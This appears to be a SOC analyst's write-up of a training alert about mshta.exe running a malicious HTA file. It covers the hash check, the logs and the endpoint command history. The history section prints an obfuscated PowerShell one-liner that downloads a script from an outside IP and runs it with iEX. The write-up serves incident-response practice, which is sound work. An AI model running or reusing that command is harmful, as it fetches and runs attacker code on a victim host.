# Details
EventID: 114
Event Time: March 5, 2022, 10:29 a.m.
Rule: SOC164 - Suspicious Mshta Behavior
Level: Security Analyst
Hostname Roberto
IP Address 172.16.17.38
Related Binary mshta.exe
Binary Path C:/Windows/System32/mshta.exe
Command Line C:/Windows/System32/mshta.exe C:/Users/Roberto/Desktop/Ps1.hta
MD5 of Ps1.hta 6685c433705f558c5535789234db0e5a
Alert Trigger Reason Low reputation hta file executed via mshta.exe
EDR Action Allowed

# Analysis
So we're investigating something regarding to `lolbin`. According to TalosIntelligence,
a LoLBin is any binary supplied by the operating system that is normally used for legitimate purposes but can also be abused by malicious actors. Several default system binaries have unexpected side effects, which may allow attackers to hide their activities post-exploitation.

## Static Analysis

### Hash and Scanners
MD5 Ps1.hta 6685c433705f558c5535789234db0e5a

- So we have a hash of a file, our first instinct should be always to run the hash through scanners. For this I'll be using VirusTotal
![Hash Result](Capture.PNG)

- And we see that this file was flagged maliciously before so we know it's something malicious happening. But did it execute / ran in our environment?

### Logs
- Using IP of Roberto `172.16.17.38`, we see a single logged file to `193.142.58.23` which is not in our environment and reaching out to the internet. Yikes

- It doing a HTTP request to the server.
`Request URL: http://193.142.58.23/Server.txt`

### Endpoint Management
- Let's view the CMD history of `Roberto` to see if it was indeed executed.
```sh
05.03.2021 10:29: C:/Windows/System32/mshta.exe C:/Users/roberto/Desktop/Ps1.hta

05.03.2021 10:30: C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe function H1($i) {$r = '' ;for ($n = 0; $n -Lt $i.LengtH; $n += 2){$r += [cHar][int]('0x' + $i.Substring($n,2))}return $r};$H2 = (new-object ('{1}{0}{2}' -f'WebCL','net.','ient'));$H3 = H1 '446f776E';$H4 = H1 '6C6f';$H5 = H1 '616473747269';$H6 = H1 '6E67';$H7 = $H3+$H4+$H5+$H6;$H8 = $H2.$H7('http://193.142.58.23/Server.txt');iEX $H8
```

- We see execution of the file by using `mshta.exe` and the malicious file.
- We then see execution of obfuscated powershell commands which looks quite like `iex webclient` which is used to download and perform HTTP requests. If you're interested to de-obfuscate it, go ahead.
- And we see the URL that we saw in the logs management. So we can conclude that it's communicating from inside to the internet.

# Putting the pieces together.
- So from all that artifacts that we collected, we can start piece-ing the puzzle.
- The binary that was used in this was `mshta.exe` which is a legitimate binary used in Windows.
- The binary was used to execute `ps1.hta` which contained malicous codes. So the malware executed the malicious activity not the user.
- The `.hta` file runs powershell commands which sends a GET request to `http://193.142.58.23/Server.txt` with god knows what.
- Usage of `mshta.exe` can be read from the [LOLBAS Project](https://lolbas-project.github.io/lolbas/Binaries/Mshta/)
- So this is a true positive as `mshta.exe` is being used to execute malicious `hta` files.




